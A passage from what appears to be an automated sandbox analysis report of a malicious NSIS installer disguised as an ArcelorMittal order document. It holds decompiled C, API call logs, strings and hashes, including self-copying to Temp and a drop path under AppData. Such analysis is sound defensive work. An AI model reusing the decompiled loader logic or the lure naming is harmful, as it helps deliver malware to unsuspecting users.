							_t153 = _t153 + 2;
							if( *_t153 == 0x53) {
								_t145 =  *((intOrPtr*)(_t153 + 2));
								if(_t145 == _t162 || _t145 == 0) {
									 *0x7a8ae0 = 1;
								}
							}
							asm("cdq");
							asm("cdq");
							_t167 = L"NCRC" & 0x0000ffff;
							asm("cdq");
							_t180 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t167;
							if( *_t153 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t180) {
								_t144 =  *((intOrPtr*)(_t153 + 8));
								if(_t144 == 0x20 || _t144 == 0) {
									_v736 = _v736 | 0x00000004;
								}
							}
							asm("cdq");
							asm("cdq");
							_t162 = L" /D=" & 0x0000ffff;
							asm("cdq");
							_t183 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t162;
							if( *(_t153 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t183) {
								goto L22;
							} else {
								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
								__eflags = _t153;
								E00406032(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t153);
								L27:
								_t191 = 0;
								goto L28;
							}
						}
					} else {
						goto L7;
					}
					do {
						L7:
						_t153 = _t153 + 2;
					} while ( *_t153 == _t162);
					goto L8;
					L22:
					_t153 = E00405A13(_t153, _t194);
					if( *_t153 == 0x22) {
						_t153 = _t153 + 2;
					}
					_t63 =  *_t153;
				} while (_t63 != 0);
				goto L27;
			}

0x00403287
0x00403289
0x0040328a
0x00403293
0x0040329b
0x0040329f
0x004032af
0x004032b2
0x004032b9
0x004032c0
0x004032c0
0x004032b9
0x004032c9
0x004032d3
0x004032dd
0x004032e4
0x004032eb
0x004032f0
0x004032f5
0x004032fc
0x00403302
0x00403318
0x00403328
0x0040332d
0x00403333
0x0040333a
0x0040334e
0x00403353
0x00403355
0x00403359
0x0040335e
0x0040335e
0x0040336d
0x0040336f
0x00403373
0x00403379
0x00403491
0x00403497
0x004034a2
0x004034a4
0x004034a9
0x004034ab
0x00403503
0x00403508
0x00403512
0x00403519
0x0040351d
0x004035ce
0x004035ce
0x004035d3
0x004035d9
0x004035df
0x00403705
0x0040370b
0x00403789
0x00403789
0x0040378e
0x00403791
0x00403793
0x00403793
0x0040379b
0x0040379b
0x0040371b
0x00403721
0x00403723
0x00403730
0x00403743
0x0040374b
0x00403753
0x00403753
0x0040375b
0x00403760
0x00403767
0x00403775
0x00403778
0x0040377e
0x00403780
0x00000000
0x00000000
0x00000000
0x00403769
0x0040376f
0x00403771
0x00403773
0x00403782
0x00403784
0x00000000
0x00403784
0x00000000
0x00403773
0x00403767
0x004035ee
0x004035f5
0x004035f5
0x00403529
0x004035be
0x004035be
0x004035ca
0x00000000
0x004035ca
0x00403536
0x0040353a
0x00403588
0x00403588
0x0040358a
0x00403592
0x00403606
0x00403608
0x0040360f
0x00403617
0x00403617
0x00403622
0x00403627
0x00403636
0x0040363a
0x0040363b
0x00403644
0x0040363d
0x0040363d
0x0040363d
0x0040364a
0x00403650
0x00403657
0x0040365f
0x0040365f
0x0040366d
0x00403679
0x00403687
0x0040368c
0x00403692
0x0040369e
0x004036a4
0x004036ae
0x004036c4
0x004036d5
0x004036db
0x004036e2
0x004036e5
0x004036eb
0x004036eb
0x004036e2
0x004036ef
0x004036f6
0x004036f6
0x004036fb
0x004036fb
0x00000000
0x00403636
0x00403594
0x00403597
0x004035a2
0x00000000
0x00000000
0x004035aa
0x004035b5
0x004035ba
0x00000000
0x004035ba
0x00403543
0x0040355b
0x0040356c
0x0040356d
0x00403571
0x00403573
0x00403581
0x00403584
0x00000000
0x00000000
0x00000000
0x00403584
0x00403586
0x00000000
0x00403586
0x004034b3
0x004034bf
0x004034c4
0x004034c9
0x004034cb
0x00000000
0x00000000
0x004034d3
0x004034db
0x004034ec
0x004034f4
0x004034f6
0x004034fb
0x004034fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040337f
0x0040337f
0x00403381
0x00403385
0x0040338e
0x00403392
0x00403394
0x00403399
0x0040339a
0x0040339a
0x0040339f
0x00000000
0x004033a5
0x004033a6
0x004033ab
0x004033ad
0x004033b4
0x004033bb
0x004033bb
0x004033b4
0x004033cc
0x004033df
0x004033e0
0x004033f5
0x004033fa
0x004033fe
0x00403407
0x0040340f
0x00403416
0x00403416
0x0040340f
0x00403422
0x00403435
0x00403436
0x0040344b
0x00403451
0x00403455
0x00000000
0x0040347c
0x0040347c
0x00403481
0x0040348a
0x0040348f
0x0040348f
0x00000000
0x0040348f
0x00403455
0x00000000
0x00000000
0x00000000
0x00403387
0x00403387
0x00403388
0x00403389
0x00000000
0x0040345d
0x00403464
0x0040346a
0x0040346d
0x0040346d
0x0040346e
0x00403471
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 0040329F
GetVersion.KERNEL32 ref: 004032A5
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004032F5
OleInitialize.OLE32(00000000), ref: 004032FC
SHGetFileInfoW.SHELL32(0079FF00,00000000,?,000002B4,00000000), ref: 00403318
GetCommandLineW.KERNEL32(Overcaustically Setup,NSIS Error), ref: 0040332D
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000000), ref: 00403340
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000020), ref: 00403367

Part of subcall function 00406408: GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
Part of subcall function 00406408: GetProcAddress.KERNEL32(00000000,?), ref: 00406435

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034A2
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034B3
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BF
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034D3
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034DB
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034EC
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034F4
DeleteFileW.KERNELBASE(1033), ref: 00403508

Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F

OleUninitialize.OLE32(?), ref: 004035D3
ExitProcess.KERNEL32 ref: 004035F5
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403608
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403617
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403622
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000000,?), ref: 0040362E
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040364A
DeleteFileW.KERNEL32(0079F700,0079F700,?,007A9000,?), ref: 004036A4
CopyFileW.KERNEL32(C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,0079F700,00000001), ref: 004036B8
CloseHandle.KERNEL32(00000000,0079F700,0079F700,?,0079F700,00000000), ref: 004036E5
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403714
OpenProcessToken.ADVAPI32(00000000), ref: 0040371B
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403730
AdjustTokenPrivileges.ADVAPI32 ref: 00403753
ExitWindowsEx.USER32(00000002,80040002), ref: 00403778
ExitProcess.KERNEL32 ref: 0040379B

Strings

Error launching installer, xrefs: 0040358A
~nsu, xrefs: 00403600
C:\Users\user\Desktop, xrefs: 00403627, 0040362C, 00403659
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate, xrefs: 004035B0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis, xrefs: 00403485, 004035A5, 00403650, 0040365A
UXTHEME, xrefs: 004032C4
SeShutdownPrivilege, xrefs: 0040372A
Overcaustically Setup, xrefs: 00403323
USERENV, xrefs: 004032CE
.tmp, xrefs: 0040361C
C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, xrefs: 004036B3
NSIS Error, xrefs: 0040331E
TMP, xrefs: 004034EF
\Temp, xrefs: 004034B9
SETUPAPI, xrefs: 004032D8
TEMP, xrefs: 004034E7
1033, xrefs: 00403503
Low, xrefs: 004034D5
"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 00403333, 00403339, 00403530
C:\Users\user\AppData\Local\Temp\, xrefs: 00403497, 0040349C, 004034B2, 004034BE, 004034CD, 004034DA, 004034E6, 004034EE, 00403605, 00403616, 00403621, 0040362D, 0040363A, 00403649, 004036FA

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate$C:\Users\user\Desktop$C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$Error launching installer$Low$NSIS Error$Overcaustically Setup$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-1936791483
Opcode ID: 55e1c2b6fe71988611f999325c05d3c9627bfef59b93c94f4dc9f559726788cb
Instruction ID: 4150c076459d7de682cc7567c7be7d1922bd71d2f30956bacb70bd1bfbc75f2d
Opcode Fuzzy Hash: 55e1c2b6fe71988611f999325c05d3c9627bfef59b93c94f4dc9f559726788cb
Instruction Fuzzy Hash: A1D10770240310ABD710BF659D45B2B3AADEB81746F11843FF581B62D2DF7D8A418B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004052D0 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004052D0(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				int _t101;
				long _t104;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a24; // 0x10442
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405264, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							__eflags = _a12 - _t94;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							__eflags = _t95 - _t156;
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406054(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
							__eflags = _t101 - _t171;
							if(_t101 == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f40;
								_v44 = 0x1fff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
									__eflags = _a4 - _t156;
									_t171 = _t171 + _t104 + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
									__eflags = _t156 - _a8;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x7a7a0c - _t156; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x7a8a48, 8);
							__eflags =  *0x7a8acc - _t156;
							if( *0x7a8acc == _t156) {
								_t119 =  *0x7a0f18; // 0x9ab874
								_t57 = _t119 + 0x34; // 0xffffffd5
								E00405191( *_t57, _t156);
							}
							E004040CF(_t171);
							goto L25;
						}
						 *0x7a0710 = 2;
						E004040CF(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E0040415D(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a10, _t156);
						ShowWindow(_t169, 8);
						E0040412B(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8a50;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a10 = GetDlgItem(_a4, 0x403);
				 *0x7a7a08 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a24 = _t134;
				_v8 = _t134;
				E0040412B( *0x7a7a10);
				 *0x7a7a14 = E00404A2E(4);
				 *0x7a7a2c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004040F6(_a4);
				if(( *0x7a8a58 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a10, _t156); // executed
					if(( *0x7a8a58 & 0x00000002) != 0) {
						 *0x7a7a10 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040412B( *0x7a7a08);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8a58 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004052d8
0x004052de
0x004052e8
0x004052eb
0x0040547a
0x00405481
0x0040549e
0x004054a5
0x004054a5
0x004054ab
0x004054b8
0x004054d6
0x004054d8
0x004054d9
0x004054e0
0x00405536
0x00405536
0x0040553a
0x00000000
0x00000000
0x0040553c
0x0040553f
0x00405542
0x00000000
0x00000000
0x0040554c
0x00405552
0x00405554
0x00405557
0x00405659
0x00000000
0x00405659
0x00405566
0x00405571
0x0040557a
0x00405581
0x00405585
0x00405588
0x00405591
0x00405597
0x0040559a
0x0040559a
0x004055aa
0x004055b0
0x004055b2
0x004055bb
0x004055be
0x004055c5
0x004055cc
0x004055d4
0x004055d4
0x004055e2
0x004055e8
0x004055eb
0x004055eb
0x004055f2
0x004055f8
0x00405604
0x0040560b
0x00405614
0x00405616
0x00405619
0x00405628
0x0040562b
0x00405631
0x00405632
0x00405638
0x00405639
0x0040563a
0x0040563a
0x00405642
0x0040564d
0x00405653
0x00405653
0x00000000
0x004055b2
0x004054e2
0x004054e8
0x00405518
0x0040551a
0x00405520
0x00405522
0x00405528
0x0040552b
0x0040552b
0x00405531
0x00000000
0x00405531
0x004054ec
0x004054f6
0x00000000
0x004054ba
0x004054ba
0x004054c0
0x004054fb
0x00000000
0x00405504
0x004054c9
0x004054ce
0x004054d1
0x00000000
0x004054d1
0x004054b8
0x004052f1
0x004052f5
0x004052fd
0x00405301
0x00405304
0x00405307
0x0040530a
0x0040530d
0x0040530e
0x0040530f
0x00405328
0x0040532b
0x00405335
0x00405344
0x0040534c
0x00405354
0x00405359
0x0040535c
0x00405368
0x00405371
0x0040537a
0x0040539c
0x004053a2
0x004053b3
0x004053b8
0x004053c6
0x004053d4
0x004053d4
0x004053d9
0x004053e7
0x004053e7
0x004053ec
0x004053ef
0x004053f4
0x00405400
0x00405409
0x00405416
0x00405425
0x00405418
0x0040541d
0x0040541d
0x00405431
0x00405431
0x00405445
0x0040544e
0x00405457
0x00405467
0x00405473
0x00405473
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040532E
GetDlgItem.USER32(?,000003EE), ref: 0040533D
GetClientRect.USER32(?,?), ref: 0040537A
GetSystemMetrics.USER32(00000002), ref: 00405381
SendMessageW.USER32(?,00001061,00000000,?), ref: 004053A2
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B3
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C6
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D4
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053E7
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405409
ShowWindow.USER32(?,00000008), ref: 0040541D
GetDlgItem.USER32(?,000003EC), ref: 0040543E
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040544E
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405467
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405473
GetDlgItem.USER32(?,000003F8), ref: 0040534C

Part of subcall function 0040412B: SendMessageW.USER32(00000028,?,00000001,00403F57), ref: 00404139

GetDlgItem.USER32(?,000003EC), ref: 00405490
CreateThread.KERNEL32(00000000,00000000,Function_00005264,00000000), ref: 0040549E
CloseHandle.KERNELBASE(00000000), ref: 004054A5
ShowWindow.USER32(00000000), ref: 004054C9
ShowWindow.USER32(00010442,00000008), ref: 004054CE
ShowWindow.USER32(00000008), ref: 00405518
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554C
CreatePopupMenu.USER32 ref: 0040555D
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405571
GetWindowRect.USER32(?,?), ref: 00405591
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AA
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E2
OpenClipboard.USER32(00000000), ref: 004055F2
EmptyClipboard.USER32 ref: 004055F8
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405604
GlobalLock.KERNEL32(00000000), ref: 0040560E
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405622
GlobalUnlock.KERNEL32(00000000), ref: 00405642
SetClipboardData.USER32(0000000D,00000000), ref: 0040564D
CloseClipboard.USER32 ref: 00405653

Strings

{, xrefs: 00405536

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 0f8705b072d52cd725f611a43b3dd691b97b3b0e52058a32ec52f25ce34b23e5
Instruction ID: d666eaf08a066d9579ddfae71cfc5fc92f0d71f62ebd549160e6baeed9b36ff9
Opcode Fuzzy Hash: 0f8705b072d52cd725f611a43b3dd691b97b3b0e52058a32ec52f25ce34b23e5
Instruction Fuzzy Hash: A3B16A71900608FFDF11AF64DD89EAE3B79FB48355F00842AFA41BA1A0CB784A51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				void* _t246;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t319 = _t246;
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
